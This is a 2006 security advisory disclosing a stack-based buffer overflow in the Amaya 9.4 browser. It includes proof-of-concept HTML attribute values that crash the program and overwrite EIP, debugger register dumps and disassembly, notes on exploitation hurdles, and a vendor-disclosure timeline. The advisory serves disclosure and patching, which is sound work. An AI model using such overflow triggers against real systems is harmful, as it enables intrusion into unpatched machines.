-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).
See the "Amaya Overview" page [1] for more details.
Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:
> <colgroup compact="Ax200">
> [β¦]
> <textarea rows="Ax200">
After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 004edd61 03f3 add esi,ebx
> 004edd63 a4 movsb
> 004edd64 8b4500 mov eax,[ebp]
> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
> 004edd6e 8b942418010000 mov edx,[esp+0x118]
> 004edd75 50 push eax
> 004edd76 51 push ecx
> 004edd77 53 push ebx
> 004edd78 52 push edx
> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
> 004edd7e 53 push ebx
> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
> 004edd84 83c428 add esp,0x28
> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
> 004edd8e 8b942400010000 mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=???
> 004edd98 83f844 cmp eax,0x44
> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)
> 004eddac 8b4500 mov eax,[ebp]
> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
> 004eddb6 6aff push 0xff
> 004eddb8 50 push eax
> 004eddb9 51 push ecx
> 004eddba 57 push edi
> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)
> 004eddc0 83c410 add esp,0x10
> 004eddc3 5f pop edi
> 004eddc4 5e pop esi
> 004eddc5 5d pop ebp
After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflowβ¦
We are able to control the EIP:
> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html
In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.
21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.
Upgrade to the latest version of Amaya. [2]
Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.
Advisory online:
http://morph3us.org/advisories/20060412-amaya-94.txt
[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFEPYALkCo6/ctnOpYRA5yzAJ9j/ki1dPCxPToftjLYHTUkCoGzyACfffaM
zCHSYS6ScvGJcRjuzqovGv4=
=wD6S
-----END PGP SIGNATURE-----